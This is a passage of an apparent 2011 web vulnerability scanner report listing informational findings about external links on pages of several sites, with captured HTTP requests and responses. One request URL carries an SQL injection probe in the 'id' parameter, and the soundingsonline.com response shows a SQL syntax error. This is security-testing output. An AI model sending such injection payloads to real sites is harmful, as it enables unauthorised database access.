<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.705. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.boats.com/
http://www.boattrader.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingssellmyboat.com/
http://www.yachtworld.com/

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<td style="text-align: left;"><a href="http://www.boats.com"><img src="/images/buttons/boatscom.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.boattrader.com"><img src="/images/buttons/boattrader.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.yachtworld.com"><img style="border: medium none; float: right;" src="/images/buttons/yachtworld.jpg" />
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.706. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/index.php?option=com_chronocontact&chronoformname=CGPage

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.chronoengine.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif
http://www.soundingssellmyboat.com/

Request

GET /index.php?option=com_chronocontact&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><img src="http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif" width="150" border="0" height="150" /></a>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.707. http://www.standingcloud.com/growbusiness.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.standingcloud.com
Path:	/growbusiness.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.standingcloud.com/growbusiness.php?utm_source=Google&utm_medium=ad&utm_content=Jan13&utm_campaign=GrowBiz/

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
http://standingcloud.uservoice.com/forums/40739
https://snapabug.appspot.com/statusImage?w=e6ce1678-f1c9-4ae3-af9f-f697f46cd4cb

Request

GET /growbusiness.php?utm_source=Google&utm_medium=ad&utm_content=Jan13&utm_campaign=GrowBiz/ HTTP/1.1
Host: www.standingcloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:35 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 10401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel="stylesheet" href="css/validationEngine.jquery.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://standingcloud.uservoice.com/forums/40739">forum</a>
...[SNIP]...
<a href="#" onclick="return SnapABug.startLink();"><img class="livechat" src="https://snapabug.appspot.com/statusImage?w=e6ce1678-f1c9-4ae3-af9f-f697f46cd4cb" border="0"></img>
...[SNIP]...

20.708. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The page was loaded from a URL containing a query string:

http://www.stumbleupon.com/submit?url={u}&title={t}

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1
http://cdn.stumble-upon.com/css/global_su.css?v=20110124-01
http://cdn.stumble-upon.com/favicon.ico
http://cdn.stumble-upon.com/i/assets/homePromo1.jpg
http://cdn.stumble-upon.com/images/close-button.png
http://cdn.stumble-upon.com/images/s.gif
http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01
http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01

Request

GET /submit?url={u}&title={t} HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=empa4rrg6jo9ugakh1lkh721o0; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=19850773854d3e53d33fc744.50514380; expires=Thu, 24-Feb-2011 04:38:43 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:43 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:43 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=abe7c16c973fe08be5772823aeef108f%7C%7C10%7C%7C1295930323%7C8fe34a4fc1d9ccac32302451d8ab8129; expires=Fri, 22-Jan-2021 04:38:43 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:43 GMT
X-Varnish: 336022115
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />

           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110124-01" type="text/css" media="screen, projection" />
       


               <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01"></script>
       <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />


               <title>
...[SNIP]...
<noscript>
               <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
           </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...


       <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01"></script>
...[SNIP]...

20.709. http://www.svenskjoomla.se/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskjoomla.se
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.svenskjoomla.se/index.php?option=com_content&task=view&id=1023&Itemid=27

The response contains the following links to other domains:

http://docs.joomla.org/What's_new_in_Joomla_1.6
http://forum.joomla.org/viewforum.php?f=63
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696
http://shop.joomla.org/
http://www.joomla.org/announcements/general-news/5348-joomlar-16-has-arrived.html

Request

GET /index.php?option=com_content&task=view&id=1023&Itemid=27 HTTP/1.1
Host: www.svenskjoomla.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:15 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/5.2.4 with Suhosin-Patch
X-Powered-By: PHP/5.2.4
Set-Cookie: c785f5238e48c40198c070b75c5431da=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16458

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<td><a href="http://forum.joomla.org/viewforum.php?f=63" target="_blank" class="mainlevel" >Joomla! Svenskt Supportforum</a>
...[SNIP]...
<td valign="top" colspan="2">
<a href="http://docs.joomla.org/What%27s_new_in_Joomla_1.6" target="_blank"><img src="images/stories/200x200.jpg" alt="200x200.jpg" style="margin: 5px; float: right; width: 200px; height: 200px" title="200x200.jpg" width="200" height="200" />
...[SNIP]...
<br />
Källa: <a href="http://www.joomla.org/announcements/general-news/5348-joomlar-16-has-arrived.html" target="_blank" title="Joomla!® 1.6 Has Arrived!">Joomla.org - Joomla!® 1.6 Has Arrived!</a><br />
<a href="http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696" target="_blank"><br />
...[SNIP]...
<td>
<a href="http://shop.joomla.org/" target="_blank"><img src="images/stories/shop_banner5c.png" border="0" alt="shop_banner5c" title="shop_banner5c" hspace="5" vspace="5" width="150" height="100" align="left" />
...[SNIP]...

20.710. http://www.t-mobile.com/Company/Community.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/Company/Community.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.t-mobile.com/Company/Community.aspx?tp=Abt_Tab_HandsetRecycling

The response contains the following links to other domains:

http://cdn.mercent.com/js/tracker.js
http://libs.coremetrics.com/eluminate.js
http://link.mercent.com/image.ashx?merchantID=TMobile
http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01067DF241FA9D9F/file/cell_phone_coverage_check.jpg
http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01071464D20B3BE5/file/contactus.jpg
http://s.tmocache.com/Js/Page.js
http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748
http://s.tmocache.com/assets/styles/decoration/foothead.gif
http://s.tmocache.com/favicon.ico
http://s.tmocache.com/htmlservices/assets/images/logo_TMoDigit.jpg
http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424
http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973
http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323
http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155
http://s.tmocache.com/js/LivePersonChat.js
http://www.epa.gov/osw/partnerships/plugin/index.htm
http://www.mobilizewitht-mobile.com/
http://www.sidekick.com/
http://www.t-mobilepr.com/
http://www.telekom.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 25 Jan 2011 04:38:47 GMT
Connection: close
Content-Length: 41256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
phone accessories, wireless phones, mobile phones, cell phone comparison, cell phone specials, cell service discounts, cheap cell phones, and get your best cell phone deal here -->

<link rel="icon" type="http://s.tmocache.com/Company/image/vnd.microsoft.icon" href="http://s.tmocache.com/favicon.ico" />
<script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s.tmocache.com/Js/Page.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748"></script>
...[SNIP]...
<a href="http://www.t-mobile.com/"><img src="http://s.tmocache.com/htmlservices/assets/images/logo_TMoDigit.jpg" title="T-Mobile cell phones, cell phone plans, and cell phone accessories" alt="T-Mobile cell phones, cell phone plans, and cell phone accessories" width="160" height="48"/><span>
...[SNIP]...
<li><a href="http://www.sidekick.com/" manual_cm_sp="global nav>discover-_-what's new-_-Sidekick ® LX TM" ><span>
...[SNIP]...
<li class="first-list-item"><a href="http://www.mobilizewitht-mobile.com/" manual_cm_sp="global nav>discover-_-making a difference-_-mobilize SM" ><span>
...[SNIP]...
<p>T-Mobile has partnered with the U.S. Environmental Protection Agency to participate in its <a href="http://www.epa.gov/osw/partnerships/plugin/index.htm" target="_blank">Plug-In to eCycling Campaign</a>
...[SNIP]...
</map><img title="Contact T-Mobile" alt="Contact T-Mobile" src="http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01071464D20B3BE5/file/contactus.jpg" usemap="#links" border="0" /> </td>
...[SNIP]...
<a href="/coverage/?WT.mc_n=coveragecheck_planslefttout2WT.mc_t=OnsiteAd"><img title="Coverage Check > Learn More" alt="Coverage Check > Learn More" src="http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01067DF241FA9D9F/file/cell_phone_coverage_check.jpg" border="0" /></a>
...[SNIP]...
<div id="hznFooterBar"><img border="0" alt="" src="http://s.tmocache.com/assets/styles/decoration/foothead.gif"/></div>
...[SNIP]...
<li class="last"><a href="http://www.t-mobilepr.com">Puerto Rico</a>
...[SNIP]...
<li><a href="http://www.telekom.com/">Deutsche Telekom</a>
...[SNIP]...
</div>
<script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155"></script><script type="text/javascript" src="http://cdn.mercent.com/js/tracker.js"></script>
...[SNIP]...
<noscript> <img alt="" src="http://link.mercent.com/image.ashx?merchantID=TMobile" style="display: none;" /> </noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

20.711. http://www.thisnext.com/pick/new/submit/sociable/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thisnext.com
Path:	/pick/new/submit/sociable/

Issue detail

The page was loaded from a URL containing a query string:

http://www.thisnext.com/pick/new/submit/sociable/?url={u}&name={t}

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://pixel.quantserve.com/pixel/p-20GZBUHZswGRM.gif
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://static.fmpub.net/site/thisnext

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:06 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: private
P3P: CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml", CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Set-Cookie: session=046f9657edcc992948bb669f4e6686bd; path=/
Set-Cookie: browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
Connection: close
Content-Length: 19298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

...[SNIP]...
</script>

           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
   <noscript>
   <img src="http://pixel.quantserve.com/pixel/p-20GZBUHZswGRM.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
   </noscript>
...[SNIP]...

